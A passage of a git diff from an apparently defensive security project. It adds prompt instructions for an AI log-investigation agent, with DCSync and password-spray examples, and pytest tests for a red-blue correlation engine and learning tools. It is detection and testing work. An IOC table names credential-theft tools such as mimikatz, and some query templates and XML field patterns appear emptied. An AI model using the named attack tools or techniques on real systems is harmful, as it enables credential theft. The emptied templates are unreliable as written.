+1. Query logs (2-3 queries max) +2. Record any findings with record_evidence() +3. Call complete_investigation(summary="...") with your findings + +If queries return empty results, that IS a finding. Complete with: +``` +complete_investigation(summary="Investigated [alert]. No matching events found in logs. +Recommend continued monitoring. Confidence: Low - no data to confirm or deny.") +``` + +**ANTI-PATTERN**: Making 3+ queries without calling complete_investigation() +**CORRECT PATTERN**: Query → Record findings → Complete ## Core Investigation Philosophy @@ -95,16 +111,51 @@ The alert's `startsAt` timestamp is likely STALE. The initial prompt provides: **DO NOT skip this stage. If you only detect the final attack without precursors, your investigation is INCOMPLETE.** -### Stage 3: LATERAL (What is the SCOPE?) +### Stage 3: LATERAL (What is the SCOPE?) - CRITICAL FOR HIGH/CRITICAL ALERTS + +For HIGH and CRITICAL severity alerts, you MUST perform lateral investigation. + 1. Call get_combined_questions() for scope questions -2. Use track_host_investigation() and track_user_investigation() -3. Check these dimensions in PARALLEL: +2. Use track_host_investigation() and track_user_investigation() for EACH entity +3. **MANDATORY LATERAL QUERIES:** + +**For each user discovered:** +``` +{job=~".+"} |~ "(?i)" +``` +- What other hosts did this user access? +- What other activities did this user perform? +- Were there failed login attempts before success? + +**For each host discovered:** +``` +{job=~".+"} |~ "(?i)" +``` +- What other users logged into this host? +- What processes were executed on this host? +- What network connections were made? + +**For each IP discovered:** +``` +{job=~".+"} |~ "" +``` +- What other hosts communicated with this IP? +- What services were accessed from this IP? +- Is this IP associated with multiple users? + +4. Check these dimensions in PARALLEL: - Same host: What else is this host doing? - Same user: Where else has this user been? - Same indicators: Where else do these IOCs appear? - Same timeframe: What else happened during this window? -4. Expand or contract scope based on findings -5. Call transition_stage("synthesis") + +5. **Build a scope map:** + - List ALL compromised/affected hosts + - List ALL compromised/affected users + - Identify the attack origin point + - Identify the furthest point of lateral movement + +6. Call transition_stage("synthesis") ### Stage 4: SYNTHESIS (Generate report) 1. Call get_investigation_summary() to review findings @@ -246,7 +297,28 @@ data sources. These tools include: - Check stats before running large queries - Prefer MCP tools when available as they're more reliable than HTTP API calls -## Evidence Recording +## Evidence Recording (CRITICAL - DO NOT SKIP) + +**You MUST extract and record ALL IOCs from query results.** For EVERY finding, call record_evidence(). + +### IOC Extraction Checklist + +When you get query results, extract and record EACH of these: + +| IOC Type | What to Look For | Pyramid Level | +|----------|------------------|---------------| +| **ip** | Source IPs, destination IPs, client IPs | 2 | +| **user** | Usernames, account names, service accounts | 4 | +| **hostname** | Computer names, server names, DC names | 4 | +| **domain** | Domain names, FQDNs | 3 | +| **process** | Process names, command lines | 4 | +| **file** | File paths, file names | 4 | +| **hash** | MD5, SHA1, SHA256 hashes | 1 | +| **artifact** | Registry keys, scheduled tasks, services | 4 | +| **tool** | Attack tools (mimikatz, rubeus, etc.) | 5 | +| **technique** | MITRE ATT&CK technique ID | 6 | + +### record_evidence() Parameters For EVERY finding, call record_evidence() with: 1. evidence_type: ip, domain, hash, process, user, file, artifact, tool, technique @@ -256,14 +328,202 @@ For EVERY finding, call record_evidence() with: 5. pyramid_level: 1-6 (6 = TTP, the goal!) 6. mitre_techniques: List of technique IDs if known +### Example: Extracting IOCs from DCSync Detection + +If you find a DCSync event, record MULTIPLE evidence items: + +```python +# Record the technique (level 6 - TTP) +record_evidence( + evidence_type="technique", + value="T1003.006 - DCSync", + source="Loki query: Event 4662", + timestamp="2026-01-10T14:30:00Z", + pyramid_level=6, + mitre_techniques=["T1003.006"] +) + +# Record the attacking user (level 4) +record_evidence( + evidence_type="user", + value="robb.stark", + source="Event 4662 SubjectUserName field", + timestamp="2026-01-10T14:30:00Z", + pyramid_level=4, + mitre_techniques=["T1003.006"] +) + +# Record the source host (level 4) +record_evidence( + evidence_type="hostname", + value="winterfell.north.sevenkingdoms.local", + source="Event 4662 SubjectLogonId correlated with 4624", + timestamp="2026-01-10T14:30:00Z", + pyramid_level=4, + mitre_techniques=["T1003.006"] +) + +# Record the source IP (level 2) +record_evidence( + evidence_type="ip", + value="10.0.4.186", + source="Event 4624 IpAddress field", + timestamp="2026-01-10T14:30:00Z", + pyramid_level=2, + mitre_techniques=["T1003.006"] +) +``` + +**DO NOT just record the technique - record ALL associated IOCs!** + +## Parsing Loki Query Results (CRITICAL) + +Loki returns structured JSON with embedded Windows Event data. You MUST parse these results. + +### Loki Response Structure + +Each result contains: +```json +{ + "timestamp": "...", + "line": "{\"computer\":\"hostname\", \"event_id\":4624, \"event_data\":\"...\"}", + "labels": {"host": "...", "deployment": "..."} +} +``` + +### Extracting IOCs from Results + +**Step 1: Parse the `line` field as JSON** +The `line` field contains the actual log entry with: +- `computer`: The hostname (e.g., "winterfell.north.sevenkingdoms.local") +- `event_id`: Windows Event ID +- `event_data`: XML containing user/IP/SID data +- `message`: Human-readable event description + +**Step 2: Extract from `event_data` XML** +Look for these XML patterns: +- `username` → Record as user +- `username` → Record as user +- `10.0.4.186` → Record as IP +- `hostname` → Record as hostname +- `DOMAIN` → Record as domain +- `C:\path\exe` → Record as process + +**Step 3: Extract from `labels`** +- `host`: Source hostname +- `computer`: Full FQDN +- `deployment`: Environment identifier + +### Example: Parsing a 4624 Logon Event + +If query returns: +``` +computer: winterfell.north.sevenkingdoms.local +event_data: robb.stark + 10.0.4.186 +``` + +You MUST call: +```python +record_evidence(evidence_type="hostname", value="winterfell.north.sevenkingdoms.local", ...) +record_evidence(evidence_type="user", value="robb.stark", ...) +record_evidence(evidence_type="ip", value="10.0.4.186", ...) +``` + +### Common Windows Event Fields by Event ID + +| Event ID | Key Fields to Extract | +|----------|----------------------| +| 4624 (Logon) | TargetUserName, IpAddress, WorkstationName, LogonType | +| 4625 (Failed Logon) | TargetUserName, IpAddress, FailureReason | +| 4662 (Object Access) | SubjectUserName, ObjectName, AccessMask | +| 4728/4732 (Group Add) | MemberName, TargetUserName (group), SubjectUserName | +| 4768 (TGT Request) | TargetUserName, IpAddress, ServiceName | +| 4769 (TGS Request) | TargetUserName, ServiceName, IpAddress, TicketEncryptionType | + +**ANTI-PATTERN**: Getting query results and immediately querying again without extracting IOCs +**CORRECT PATTERN**: Get results → Parse JSON → Extract each IOC → record_evidence() for each → Then query again if needed + ## Completion Criteria -Call complete_investigation() when: -1. get_combined_questions() returns no high-priority questions -2. You have TTPs identified (pyramid level 6) -3. Tactical coverage is reasonable (checked major attack phases) -4. Timeline is coherent -5. Scope is understood +Call complete_investigation(summary, attack_synopsis, recommendations) when: +1. You have investigated the alert and recorded evidence +2. You understand what happened (attack type, affected hosts/users) +3. You can provide recommendations + +### Summary Requirements + +The **summary** should include: +- What attack/activity was detected +- Key findings and affected hosts/users +- Confidence level + +### Attack Synopsis Requirements (CRITICAL) + +The **attack_synopsis** is a narrative describing the attack chain. It should: +- Describe the attack from start to finish in chronological order +- Include specific hostnames, usernames, IPs, and timestamps +- Explain how the attacker progressed (what they did first, second, etc.) +- Connect the dots between evidence pieces + +**Good Synopsis Example:** +``` +"On 2026-01-10 at 14:30 UTC, attacker from IP 10.0.4.186 began password spraying +against domain accounts. After 47 failed attempts, they successfully authenticated +as arya.stark at 14:45. Using these credentials, they accessed SYSVOL share on +DC01 at 14:52 to harvest GPP passwords. At 15:10, they executed DCSync from +workstation WS-042, extracting the krbtgt hash. Total time from initial access +to domain compromise: 40 minutes." +``` + +**Bad Synopsis Example:** +``` +"DCSync attack detected." (Too vague, no details) +``` + +### Recommendations Requirements (CRITICAL) + +The **recommendations** list should include: +1. **Extract from alert annotations**: The alert's `response` annotation contains expert-written response steps - USE THEM +2. **Add investigation-specific findings**: Based on what you discovered +3. **Prioritize by severity**: Critical actions first + +**Always check the alert annotations for:** +- `response`: Contains step-by-step remediation guidance +- `summary`: Contains concise attack description +- `description`: Contains detailed attack explanation + +Example with all three parameters: +``` +complete_investigation( + summary="Detected DCSync attack. User robb.stark executed replication requests " + "from winterfell.north.sevenkingdoms.local. NTLM hashes exfiltrated for " + "multiple domain accounts. Confidence: High based on Event 4662 correlation.", + attack_synopsis="Initial access occurred via password spray at 14:30 UTC with " + "47 failed logons against 12 accounts. Successful authentication " + "as robb.stark at 14:45. SYSVOL accessed at 14:52. DCSync executed " + "at 15:10 targeting krbtgt and Administrator accounts.", + recommendations=[ + "IMMEDIATE: Reset krbtgt password twice (10 hours apart)", + "IMMEDIATE: Reset all compromised account passwords", + "Isolate source host winterfell.north.sevenkingdoms.local", + "Block source IP at network perimeter", + "Hunt for golden ticket usage (Event 4769 with RC4)", + "Review all privileged account access in past 24 hours" + ] +) +``` + +### Timeline Building (MANDATORY) + +You MUST call add_timeline_event() for EVERY significant event discovered: +- Authentication events (successful and failed) +- Share access events +- Privilege escalation events +- Lateral movement events +- Data exfiltration indicators + +**Even if you only have the alert timestamp**, create a timeline event for it. Call escalate_investigation() if: - Active, ongoing attack detected diff --git a/tests/test_correlation.py b/tests/test_correlation.py new file mode 100644 index 00000000..8819735e --- /dev/null +++ b/tests/test_correlation.py @@ -0,0 +1,735 @@ +"""Tests for the Red-Blue Correlation Engine.""" + +import tempfile +from datetime import datetime, timedelta, timezone +from pathlib import Path + +import pytest + +from ares.core.correlation import ( + BlueTeamDetection, + CorrelationMatch, + CorrelationReport, + DetectionGap, + RedBlueCorrelator, + RedTeamActivity, +) + + +@pytest.fixture +def temp_reports_dir() -> Path: + """Create a temporary reports directory.""" + with tempfile.TemporaryDirectory() as tmpdir: + yield Path(tmpdir) + + +@pytest.fixture +def sample_red_activity() -> RedTeamActivity: + """Create a sample red team activity.""" + return RedTeamActivity( + timestamp=datetime(2024, 1, 15, 10, 30, 0, tzinfo=timezone.utc), + technique_id="T1059.001", + technique_name="PowerShell", + action="Executed PowerShell command for reconnaissance", + target_ip="192.168.1.100", + target_host="server01", + credential_used="admin", + success=True, + metadata={"command": "Get-Process"}, + ) + + +@pytest.fixture +def sample_blue_detection() -> BlueTeamDetection: + """Create a sample blue team detection.""" + return BlueTeamDetection( + timestamp=datetime(2024, 1, 15, 10, 32, 0, tzinfo=timezone.utc), + alert_name="Suspicious PowerShell Activity", + technique_id="T1059.001", + severity="high", + target_ip="192.168.1.100", + target_host="server01", + investigation_id="inv-001", + status="completed", + evidence_count=5, + highest_pyramid_level=3, + metadata={"rule_id": "rule-ps-001"}, + ) + + +class TestRedTeamActivity: + """Tests for RedTeamActivity dataclass.""" + + def test_key_generation(self, sample_red_activity: RedTeamActivity) -> None: + """Test unique key generation.""" + key = sample_red_activity.key + + assert "2024-01-15" in key + assert "T1059.001" in key + assert "192.168.1.100" in key + + def test_key_uniqueness(self) -> None: + """Test that different activities have different keys.""" + activity1 = RedTeamActivity( + timestamp=datetime(2024, 1, 15, 10, 30, 0, tzinfo=timezone.utc), + technique_id="T1059.001", + technique_name="PowerShell", + action="Action 1", + target_ip="192.168.1.100", + target_host=None, + credential_used=None, + success=True, + ) + activity2 = RedTeamActivity( + timestamp=datetime(2024, 1, 15, 10, 31, 0, tzinfo=timezone.utc), + technique_id="T1059.001", + technique_name="PowerShell", + action="Action 2", + target_ip="192.168.1.100", + target_host=None, + credential_used=None, + success=True, + ) + + assert activity1.key != activity2.key + + +class TestBlueTeamDetection: + """Tests for BlueTeamDetection dataclass.""" + + def test_key_generation(self, sample_blue_detection: BlueTeamDetection) -> None: + """Test unique key generation.""" + key = sample_blue_detection.key + + assert "2024-01-15" in key + assert "T1059.001" in key + assert "Suspicious PowerShell Activity" in key + + +class TestCorrelationMatch: + """Tests for CorrelationMatch dataclass.""" + + def test_match_quality_strong( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test strong match quality classification.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=120.0, # 2 minutes + technique_match=True, + target_match=True, + confidence=0.9, + ) + + assert match.match_quality == "STRONG" + + def test_match_quality_good( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test good match quality classification.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=400.0, # ~7 minutes + technique_match=True, + target_match=False, + confidence=0.6, + ) + + assert match.match_quality == "GOOD" + + def test_match_quality_weak( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test weak match quality classification.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=700.0, # ~12 minutes + technique_match=True, + target_match=False, + confidence=0.4, + ) + + assert match.match_quality == "WEAK" + + def test_match_quality_tenuous( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test tenuous match quality classification.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=700.0, + technique_match=False, + target_match=False, + confidence=0.2, + ) + + assert match.match_quality == "TENUOUS" + + +class TestCorrelationReport: + """Tests for CorrelationReport dataclass.""" + + def test_to_dict( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test conversion to dictionary.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=120.0, + technique_match=True, + target_match=True, + confidence=0.9, + ) + + gap = DetectionGap( + red_activity=sample_red_activity, + reason="No alert rule configured", + recommended_detection="Add PowerShell monitoring", + ) + + report = CorrelationReport( + analysis_timestamp=datetime.now(timezone.utc), + red_operation_id="op-001", + time_window_start=datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc), + time_window_end=datetime(2024, 1, 15, 11, 0, 0, tzinfo=timezone.utc), + total_red_activities=10, + total_blue_detections=8, + matched_activities=7, + undetected_activities=3, + false_positive_detections=1, + matches=[match], + gaps=[gap], + false_positives=[sample_blue_detection], + detection_rate=0.7, + false_positive_rate=0.125, + mean_time_to_detect=120.0, + technique_coverage={ + "T1059.001": {"total": 5, "detected": 4, "missed": 1, "detection_rate": 0.8} + }, + ) + + data = report.to_dict() + + assert data["red_operation_id"] == "op-001" + assert data["summary"]["total_red_activities"] == 10 + assert data["summary"]["detection_rate"] == "70.0%" + assert len(data["matches"]) == 1 + assert len(data["gaps"]) == 1 + assert "T1059.001" in data["technique_coverage"] + + +class TestRedBlueCorrelator: + """Tests for RedBlueCorrelator.""" + + def test_init(self, temp_reports_dir: Path) -> None: + """Test correlator initialization.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + assert correlator.reports_dir == temp_reports_dir + assert correlator.time_window == timedelta(minutes=30) + + def test_init_custom_time_window(self, temp_reports_dir: Path) -> None: + """Test correlator with custom time window.""" + correlator = RedBlueCorrelator(temp_reports_dir, time_window_minutes=60) + + assert correlator.time_window == timedelta(minutes=60) + + def test_correlate_perfect_match( + self, + temp_reports_dir: Path, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test correlation with perfect technique and target match.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[sample_blue_detection], + operation_id="test-op", + ) + + assert report.total_red_activities == 1 + assert report.total_blue_detections == 1 + assert report.matched_activities == 1 + assert report.undetected_activities == 0 + assert len(report.matches) == 1 + assert report.matches[0].technique_match is True + assert report.matches[0].target_match is True + + def test_correlate_no_match_outside_time_window( + self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity + ) -> None: + """Test that activities outside time window are not matched.""" + correlator = RedBlueCorrelator(temp_reports_dir, time_window_minutes=10) + + # Detection 1 hour after activity + late_detection = BlueTeamDetection( + timestamp=sample_red_activity.timestamp + timedelta(hours=1), + alert_name="Late Detection", + technique_id="T1059.001", + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-late", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[late_detection], + operation_id="test-op", + ) + + assert report.matched_activities == 0 + assert report.undetected_activities == 1 + + def test_correlate_technique_mismatch( + self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity + ) -> None: + """Test correlation with technique mismatch.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + wrong_technique_detection = BlueTeamDetection( + timestamp=sample_red_activity.timestamp + timedelta(minutes=2), + alert_name="Different Technique", + technique_id="T1003.001", # Different technique + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-001", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[wrong_technique_detection], + operation_id="test-op", + ) + + # Should still match based on target and time proximity + assert len(report.matches) == 1 + assert report.matches[0].technique_match is False + assert report.matches[0].target_match is True + + def test_correlate_multiple_activities(self, temp_reports_dir: Path) -> None: + """Test correlation with multiple activities and detections.""" + correlator = RedBlueCorrelator(temp_reports_dir) + base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc) + + # Use different target IPs to prevent cross-matching via target + red_activities = [ + RedTeamActivity( + timestamp=base_time + timedelta(minutes=i * 10), + technique_id=f"T100{i}", + technique_name=f"Technique {i}", + action=f"Action {i}", + target_ip=f"192.168.1.{100 + i}", # Different IPs + target_host=None, + credential_used=None, + success=True, + ) + for i in range(5) + ] + + # Only detect 3 of 5 activities (matching technique and target) + blue_detections = [ + BlueTeamDetection( + timestamp=base_time + timedelta(minutes=i * 10 + 2), + alert_name=f"Alert {i}", + technique_id=f"T100{i}", + severity="high", + target_ip=f"192.168.1.{100 + i}", # Matching IPs + target_host=None, + investigation_id=f"inv-{i}", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ) + for i in [0, 2, 4] # Only detect activities 0, 2, 4 + ] + + report = correlator.correlate( + red_activities=red_activities, + blue_detections=blue_detections, + operation_id="test-op", + ) + + assert report.total_red_activities == 5 + assert report.total_blue_detections == 3 + assert report.matched_activities == 3 + assert report.undetected_activities == 2 + assert report.detection_rate == 0.6 + + def test_correlate_empty_activities(self, temp_reports_dir: Path) -> None: + """Test correlation with no activities.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report = correlator.correlate( + red_activities=[], + blue_detections=[], + operation_id="empty-op", + ) + + assert report.total_red_activities == 0 + assert report.detection_rate == 0.0 + + def test_correlate_identifies_false_positives( + self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity + ) -> None: + """Test that unmatched detections are identified as false positives.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + # Detection without corresponding red activity + unrelated_detection = BlueTeamDetection( + timestamp=sample_red_activity.timestamp + timedelta(minutes=5), + alert_name="Unrelated Alert", + technique_id="T9999", # No matching red activity + severity="low", + target_ip="10.0.0.1", # Different target + target_host=None, + investigation_id="inv-fp", + status="completed", + evidence_count=0, + highest_pyramid_level=0, + ) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[ + BlueTeamDetection( + timestamp=sample_red_activity.timestamp + timedelta(minutes=2), + alert_name="Matching Alert", + technique_id="T1059.001", + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-001", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ), + unrelated_detection, + ], + operation_id="test-op", + ) + + assert len(report.false_positives) == 1 + assert report.false_positives[0].alert_name == "Unrelated Alert" + + def test_technique_coverage_calculation(self, temp_reports_dir: Path) -> None: + """Test technique coverage calculation.""" + correlator = RedBlueCorrelator(temp_reports_dir) + base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc) + + # Create activities with DIFFERENT techniques and targets for clear matching + # This ensures each activity can only match its corresponding detection + red_activities = [ + RedTeamActivity( + timestamp=base_time + timedelta(minutes=i * 10), + technique_id=f"T105{i}", # Different technique per activity + technique_name=f"Technique {i}", + action=f"Action {i}", + target_ip=f"192.168.1.{100 + i}", # Different targets + target_host=None, + credential_used=None, + success=True, + ) + for i in range(4) + ] + + # Only detect 3 of 4 (activities 0, 1, 2 but not 3) + blue_detections = [ + BlueTeamDetection( + timestamp=base_time + timedelta(minutes=i * 10, seconds=30), + alert_name=f"Alert {i}", + technique_id=f"T105{i}", # Matching technique + severity="high", + target_ip=f"192.168.1.{100 + i}", # Matching targets + target_host=None, + investigation_id=f"inv-{i}", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ) + for i in range(3) # Only first 3 activities get detected + ] + + report = correlator.correlate( + red_activities=red_activities, + blue_detections=blue_detections, + operation_id="test-op", + ) + + # Should have coverage data for all 4 techniques + assert len(report.technique_coverage) == 4 + # 3 techniques should be detected (T1050, T1051, T1052) + # 1 technique should be missed (T1053) + detected_count = sum(1 for t in report.technique_coverage.values() if t["detected"] > 0) + missed_count = sum(1 for t in report.technique_coverage.values() if t["missed"] > 0) + assert detected_count == 3 + assert missed_count == 1 + assert report.matched_activities == 3 + assert report.undetected_activities == 1 + + def test_mean_time_to_detect( + self, + temp_reports_dir: Path, + ) -> None: + """Test mean time to detect calculation.""" + correlator = RedBlueCorrelator(temp_reports_dir) + base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc) + + red_activities = [ + RedTeamActivity( + timestamp=base_time, + technique_id="T1059.001", + technique_name="PowerShell", + action="Action 1", + target_ip="192.168.1.100", + target_host=None, + credential_used=None, + success=True, + ), + RedTeamActivity( + timestamp=base_time + timedelta(minutes=10), + technique_id="T1059.002", + technique_name="Script", + action="Action 2", + target_ip="192.168.1.100", + target_host=None, + credential_used=None, + success=True, + ), + ] + + blue_detections = [ + BlueTeamDetection( + timestamp=base_time + timedelta(seconds=60), # 60s after + alert_name="Alert 1", + technique_id="T1059.001", + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-1", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ), + BlueTeamDetection( + timestamp=base_time + timedelta(minutes=10, seconds=120), # 120s after + alert_name="Alert 2", + technique_id="T1059.002", + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-2", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ), + ] + + report = correlator.correlate( + red_activities=red_activities, + blue_detections=blue_detections, + operation_id="test-op", + ) + + # Mean of 60s and 120s = 90s + assert report.mean_time_to_detect == 90.0 + + def test_generate_report_markdown( + self, + temp_reports_dir: Path, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test markdown report generation.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[sample_blue_detection], + operation_id="test-op", + ) + + markdown = correlator.generate_report_markdown(report) + + assert "# Red-Blue Correlation Report" in markdown + assert "Executive Summary" in markdown + assert "test-op" in markdown + assert "Detection Rate" in markdown + + def test_load_red_team_report_basic(self, temp_reports_dir: Path) -> None: + """Test loading a basic red team report.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + # Create a sample red team report + report_content = """# Red Team Operation Report + +**Operation ID**: op-test-001 +**Target**: 192.168.1.100 +**Started**: 2024-01-15 10:00:00 UTC + +### Hosts (3) +Found 3 hosts during scanning. + +### Credentials (2) +**admin** +Source: password guessing + +**backup** +Source: credential dumping + +### Timeline of Key Events +| Timestamp | Event | Technique | +|-----------|-------|-----------| +| 2024-01-15T10:05:00Z | Initial access | T1078 | +| 2024-01-15T10:10:00Z | Privilege escalation | T1068 | + +**Domain Admin Access**: ✓ +**Golden Ticket**: ✓ +""" + report_path = temp_reports_dir / "redteam-op-test-001.md" + report_path.write_text(report_content) + + operation_id, activities = correlator.load_red_team_report(report_path) + + assert operation_id == "op-test-001" + assert len(activities) > 0 + + # Check for network discovery activity + discovery = next((a for a in activities if a.technique_id == "T1046"), None) + assert discovery is not None + assert "3 host" in discovery.action + + def test_load_investigation_report(self, temp_reports_dir: Path) -> None: + """Test loading an investigation report.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report_content = """# Investigation Report + +**Investigation ID:** `inv-20240115-001` + +| Field | Value | +|-------|-------| +| Alert Name | Suspicious PowerShell Activity | +| Severity | high | +| Status | completed | + +Alert payload contains: +"startsAt": "2024-01-15T10:30:00Z" + +Target IP: 192.168.1.100 + +Technique: T1059.001 + +**Evidence Collected:** 5 +**Highest Pyramid Level:** 3 +""" + report_path = temp_reports_dir / "investigation_20240115_103000.md" + report_path.write_text(report_content) + + detection = correlator.load_investigation_report(report_path) + + assert detection is not None + assert detection.investigation_id == "inv-20240115-001" + assert detection.alert_name == "Suspicious PowerShell Activity" + assert detection.severity == "high" + assert detection.technique_id == "T1059.001" + assert detection.evidence_count == 5 + assert detection.highest_pyramid_level == 3 + + def test_load_investigation_report_skips_no_data(self, temp_reports_dir: Path) -> None: + """Test that DatasourceNoData reports are skipped.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report_path = temp_reports_dir / "investigation_DatasourceNoData_20240115.md" + report_path.write_text("Some content") + + detection = correlator.load_investigation_report(report_path) + + assert detection is None + + def test_load_all_reports(self, temp_reports_dir: Path) -> None: + """Test loading all reports from directory.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + # Create red team report + red_report = temp_reports_dir / "redteam-op001.md" + red_report.write_text("""# Red Team Report +**Operation ID**: op001 +**Target**: 192.168.1.1 +**Started**: 2024-01-15 10:00:00 UTC +### Hosts (1) +### Credentials (0) +""") + + # Create investigation report + inv_report = temp_reports_dir / "investigation_20240115.md" + inv_report.write_text("""# Investigation +**Investigation ID:** `inv-001` +| Alert Name | Test Alert | +| Severity | high | +| Status | completed | +"startsAt": "2024-01-15T10:30:00Z" +**Evidence Collected:** 1 +**Highest Pyramid Level:** 1 +""") + + # Create non-report file (should be ignored) + other_file = temp_reports_dir / "readme.md" + other_file.write_text("# README") + + red_reports, blue_detections = correlator.load_all_reports() + + assert len(red_reports) == 1 + assert red_reports[0][0] == "op001" + assert len(blue_detections) >= 0 # May or may not parse depending on format + + +class TestDetectionGap: + """Tests for DetectionGap dataclass.""" + + def test_gap_with_recommendation(self, sample_red_activity: RedTeamActivity) -> None: + """Test detection gap with recommendation.""" + gap = DetectionGap( + red_activity=sample_red_activity, + reason="No alert rule configured", + recommended_detection="Add PowerShell monitoring rule", + mitre_data_sources=["Process: Process Creation", "Script: Script Execution"], + ) + + assert gap.reason == "No alert rule configured" + assert gap.recommended_detection == "Add PowerShell monitoring rule" + assert len(gap.mitre_data_sources) == 2 + + def test_gap_without_recommendation(self, sample_red_activity: RedTeamActivity) -> None: + """Test detection gap without recommendation.""" + gap = DetectionGap( + red_activity=sample_red_activity, + reason="Unknown technique", + ) + + assert gap.recommended_detection is None + assert gap.mitre_data_sources == [] diff --git a/tests/test_learning.py b/tests/test_learning.py new file mode 100644 index 00000000..7262e8e4 --- /dev/null +++ b/tests/test_learning.py @@ -0,0 +1,529 @@ +"""Tests for the Learning Tools module.""" + +import tempfile +from datetime import datetime, timedelta, timezone +from pathlib import Path + +import pytest + +from ares.core.persistence import InvestigationStore, StoredInvestigation +from ares.tools.blue.learning import LearningTools + + +@pytest.fixture +def temp_db() -> Path: + """Create a temporary database file.""" + with tempfile.TemporaryDirectory() as tmpdir: + yield Path(tmpdir) / "test_learning.db" + + +@pytest.fixture +def store(temp_db: Path) -> InvestigationStore: + """Create a fresh investigation store.""" + return InvestigationStore(temp_db) + + +@pytest.fixture +def learning_tools(store: InvestigationStore) -> LearningTools: + """Create learning tools with test store.""" + return LearningTools(store=store) + + +@pytest.fixture +def populated_store(store: InvestigationStore) -> InvestigationStore: + """Create a store with sample investigation data.""" + now = datetime.now(timezone.utc) + + # Create several investigations + investigations = [ + StoredInvestigation( + investigation_id=f"inv-{i}", + alert_name="HighCPUUsage", + alert_fingerprint="rule-cpu-001", + severity="warning", + technique_id="T1059.001", + technique_name="PowerShell", + started_at=now - timedelta(hours=i), + completed_at=now - timedelta(hours=i) + timedelta(minutes=10), + duration_seconds=600.0, + status="completed", + evidence_count=i + 1, + highest_pyramid_level=min(i, 4), + techniques_identified=["T1059.001"], + queries_executed=[{"query": "{job='windows'}", "result_count": i}], + query_success_rate=0.7, + effective_queries=["{job='windows'} |= 'powershell'"], + is_true_positive=i % 2 == 0, # Alternating true/false + ) + for i in range(5) + ] + + # Add a different alert type + investigations.append( + StoredInvestigation( + investigation_id="inv-different", + alert_name="SuspiciousLogin", + alert_fingerprint="rule-login-001", + severity="high", + technique_id="T1078", + technique_name="Valid Accounts", + started_at=now - timedelta(hours=1), + completed_at=now - timedelta(minutes=50), + duration_seconds=600.0, + status="completed", + evidence_count=3, + highest_pyramid_level=2, + techniques_identified=["T1078"], + queries_executed=[{"query": "{job='auth'}", "result_count": 5}], + query_success_rate=0.8, + effective_queries=["{job='auth'} |= 'failed'"], + is_true_positive=True, + ) + ) + + for inv in investigations: + store.store_investigation(inv) + + # Add query effectiveness data + for _ in range(5): + store.update_query_effectiveness( + query_pattern="{job='windows'} |= 'powershell'", + successful=True, + produced_evidence=True, + alert_type="HighCPUUsage", + ) + store.update_query_effectiveness( + query_pattern="{job='auth'} |= 'failed'", + successful=True, + produced_evidence=True, + alert_type="SuspiciousLogin", + ) + + return store + + +@pytest.fixture +def populated_learning_tools(populated_store: InvestigationStore) -> LearningTools: + """Create learning tools with populated store.""" + return LearningTools(store=populated_store) + + +class TestLearningToolsInit: + """Tests for LearningTools initialization.""" + + def test_init_with_store(self, store: InvestigationStore) -> None: + """Test initialization with provided store.""" + tools = LearningTools(store=store) + + assert tools.store is store + + def test_init_without_store(self) -> None: + """Test initialization without store uses global.""" + tools = LearningTools() + + assert tools.store is None + # Accessing get_store() should get/create global store + # (but we won't test that to avoid side effects) + + def test_get_store_returns_provided_store(self, store: InvestigationStore) -> None: + """Test that get_store() returns provided store.""" + tools = LearningTools(store=store) + + assert tools.get_store() is store + + +class TestFindSimilarInvestigations: + """Tests for 